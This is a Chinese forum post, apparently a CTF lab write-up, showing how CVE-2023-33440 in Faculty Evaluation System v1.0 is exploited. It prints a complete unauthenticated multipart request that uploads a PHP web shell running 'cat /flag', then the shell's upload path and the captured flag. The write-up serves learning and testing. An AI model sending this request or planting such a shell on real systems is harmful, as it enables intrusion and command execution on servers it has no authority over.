十念 发表于 4 天前

CVE-2023-33440(任意文件上传)

简介

Faculty Evaluation System v1.0 存在未授权任意文件上传漏洞漏洞
过程

打开靶场
https://i-blog.csdnimg.cn/direct/bb31c32b5e80462a91e84113b3c8c477.png
举行目录扫描
https://i-blog.csdnimg.cn/direct/86d13b264bc24a108fb102324e703e9c.png
发现后台login.php,进入查看
https://i-blog.csdnimg.cn/direct/95e9eefe8f644bb8bf4f1ac58d6d747c.png
弱口令举行测试,无效,无法进入
根据提示是未授权访问文件上传 ,应该是不需要登录就能触发漏洞的,直接举行抓包
poc如下
POST /ajax.php?action=update_user HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://XXX/index.php?page=report
Content-Length: 750
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close

-----------------------------166782539326470
Content-Disposition: form-data; name="id"

1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"

Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"

a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"

admin@admin.com
-----------------------------166782539326470
Content-Disposition: form-data; name="password"

admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream

<?php system("cat /flag");?>
-----------------------------166782539326470-- 自己本地举行抓包之后修改ip
https://i-blog.csdnimg.cn/direct/da1b078a7a84458a8dd5be54b2e96c89.png
抓包之后应该发如图所示的包
发包乐成
https://i-blog.csdnimg.cn/direct/dc54cb26be53464980c6f641dce9a2ad.png
访问shell
http://xxx/assets/uploads/1721405880_php.php 得到flag{4a73a5b5-f582-4070-8229-dc447aae57c5}

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: CVE-2023-33440(任意文件上传)